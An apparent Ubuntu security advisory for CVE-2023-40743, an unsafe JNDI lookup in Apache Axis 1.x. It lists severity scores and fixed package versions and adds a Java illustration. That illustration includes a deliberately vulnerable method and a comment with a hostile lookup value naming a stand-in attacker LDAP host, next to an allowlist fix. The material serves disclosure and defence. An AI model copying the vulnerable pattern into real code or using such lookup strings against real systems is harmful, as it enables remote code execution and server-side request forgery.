Source: Ubuntu CVE tracker (ubuntu.com), UB:CVE-2023-40743, published Sep 05, 2023

CVE-2023-40743

Tags: apache axis, security vulnerability, servicefactorygetservice, dos, ssrf, rce, eol, apache axis 2/java, untrusted input, patch, bug report

CVSS3: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH

EPSS: 0.003 (percentile 69.6%)

UNSUPPORTED WHEN ASSIGNED (the affected product was already end-of-life when
this CVE was assigned). When integrating Apache Axis 1.x in an application, it
may not have been obvious that looking up a service through
ServiceFactory.getService resolves the supplied name through JNDI, which
allows potentially dangerous lookup mechanisms such as LDAP. When untrusted
input is passed to this API method, the application can be exposed to DoS,
SSRF and even attacks leading to RCE. As Axis 1 is EOL, migrate to a different
SOAP engine, such as Apache Axis 2/Java. As a workaround, review your code to
verify that no untrusted or unsanitized input is passed to
ServiceFactory.getService, or apply the patch from
https://github.com/apache/axis-axis1-java/commit/7e66753427466590d6def0125e448d2791723210
. The Apache Axis project does not expect to create an Axis 1.x release
fixing this problem, though contributors who would like to work towards
this are welcome. On Ubuntu, the fixed package versions are listed below.
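The pattern the advisory warns about, next to the allowlist check it recommends as a workaround. This is an added illustration, not code from the advisory or from the Apache Axis project. It assumes Axis 1.4 (org.apache.axis.client.ServiceFactory) on the classpath and that getService reads its JNDI name from the map key ServiceFactory.SERVICE_NAME, as in the Axis 1.x source; the servlet, the "service" request parameter and the service names are hypothetical.

```java
// Added example for CVE-2023-40743; not code from the advisory or from Apache Axis.
// Assumes axis-1.4 on the classpath and that ServiceFactory.getService() takes its
// JNDI name from the map entry ServiceFactory.SERVICE_NAME (as in the Axis 1.x
// source). Servlet, parameter name and service names are hypothetical.
import java.util.Arrays;
import java.util.Collections;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;
import java.util.Set;
import javax.servlet.http.HttpServletRequest;
import org.apache.axis.client.Service;
import org.apache.axis.client.ServiceFactory;

public class AxisServiceLookup {

    // VULNERABLE: the request parameter flows straight into the environment map.
    // getService() hands that string to InitialContext.lookup(), so a value such as
    // "ldap://attacker.example:1389/x" makes the server open an outbound LDAP
    // connection (SSRF), hang on an unresponsive host (DoS) or, on a JDK that still
    // dereferences remote object factories, load attacker-supplied code (RCE).
    public static Service lookupUnsafe(HttpServletRequest req) {
        Map<String, Object> env = new HashMap<String, Object>();
        env.put(ServiceFactory.SERVICE_NAME, req.getParameter("service"));
        return ServiceFactory.getService(env);
    }

    // HARDENED (the advisory's workaround): only names fixed at build time reach
    // getService(). This is a closed allowlist, not a pattern: a check such as
    // "must not start with ldap:" would leave rmi:, dns:, iiop: and any future
    // JNDI provider reachable.
    private static final Set<String> KNOWN_SERVICES = Collections.unmodifiableSet(
            new HashSet<String>(Arrays.asList("axisServiceName", "OrderService")));

    public static Service lookupSafe(HttpServletRequest req) {
        String requested = req.getParameter("service");
        if (requested == null || !KNOWN_SERVICES.contains(requested)) {
            throw new IllegalArgumentException("unknown service name");
        }
        Map<String, Object> env = new HashMap<String, Object>();
        env.put(ServiceFactory.SERVICE_NAME, requested);
        return ServiceFactory.getService(env);
    }
}
```

The allowlist removes the attacker's control over the lookup name, but it does not change the library: the JNDI lookup still runs for every name that passes. Treat it as a stopgap and still install the fixed distribution package or apply the upstream commit, and give the other keys placed in the environment map (WSDL location and the like) the same "no request-derived values" review.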

Affected packages (fixed in the version shown)

OS      Version  Architecture  Package  Fixed version
ubuntu  16.04    noarch        axis     < 1.4-24ubuntu0.1~esm1
ubuntu  18.04    noarch        axis     < 1.4-25ubuntu0.1~esm1
ubuntu  20.04    noarch        axis     < 1.4-28+deb10u1build0.20.04.1
ubuntu  22.04    noarch        axis     < 1.4-28+deb10u1build0.22.04.1
ubuntu  23.04    noarch        axis     < 1.4-28+deb10u1build0.23.04.1
ubuntu  23.10    noarch        axis     < 1.4-28+deb10u1build0.23.10.1
